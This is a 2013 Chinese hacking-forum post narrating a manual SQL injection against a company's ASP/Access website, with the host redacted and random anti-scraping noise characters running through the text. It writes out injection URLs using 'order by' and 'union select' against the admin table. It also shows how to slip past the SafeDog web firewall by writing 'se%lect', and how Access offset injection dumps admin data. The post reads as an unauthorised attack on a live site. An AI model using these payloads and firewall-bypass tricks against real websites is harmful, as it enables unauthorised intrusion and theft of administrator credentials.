找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2174|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
* F. g7 `4 Q% _% [/ B& T/ r/ q+ i  g  [/ \
8 Z/ b0 y$ O. z2 @7 _  U
顺手加个admin
* R6 G1 V( [" D5 _) b8 [" u
, P8 U3 Z( a9 ^- r/ B. {" g- ~: I
; H' d. |, f5 p. x# o默认后台。7 F' m) i- g$ z2 Z7 k, _
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​% N$ X' T: h7 G/ v" J
# j1 x3 C9 l3 V. E# H$ b7 _( m
5 o2 `& t. e$ t; o3 P

" @, j: _  D" o1 N' \所以就不用御剑扫了,待会直接封IP。
; t$ \: a: B. x! _ , @  y* C! H2 W- k! e
用order by语句判断是否存在注入。
+ B! h5 t  J( D0 t6 B; Hhttp://www.xxx.com /product_show.asp?id=997 order by 1
7 j/ ]+ r, [5 \: j; `8 F9 Rhttp://www.xxx.com /product_show.asp?id=997 order by 1000 Y( N* ^" {1 u0 v$ G4 m
现在存在注入,经测试后发现是9个字段。; j* V2 c; q3 g& U9 @& u

7 c$ n- z2 ^6 A8 x1 T接下来进行联合查询,猜是否存在admin表。
+ X& ]7 H5 x( ]: n, a1 ]http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​  p6 Y# p( K& p7 ]( {0 U

5 _- r" i7 B0 _  t
) X: N% r6 l: L; D' e/ f  T$ u; }8 a& c4 S
在select中间加个%,se%lect绕过安全狗。
! U5 S9 F5 Y" e; A1 o7 u: n
& h2 e6 k/ Y4 `4 q* |. c  Q( t* W
发现存在admin表,然后开始手工猜常用的字段。8 e6 E) C: f1 e2 c
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。! H8 x3 q" G& D8 }" ^- T% {5 h
' w8 I) Q$ b8 t
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
: {4 U+ j+ a3 a* \- q6 _ 8 `" F7 o. F  p6 P) l! [
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。! L  _' u5 [- q
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
6 L2 A+ W% O  p6 Y; a好了,敏感内容出显了。​9 k$ x+ t1 ^. e1 ]1 p6 Z3 _9 N

6 k5 ^6 D1 F5 S7 O5 O) ~* j0 K% }7 C( A* O

2 r- z$ Y. R$ k( B; g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表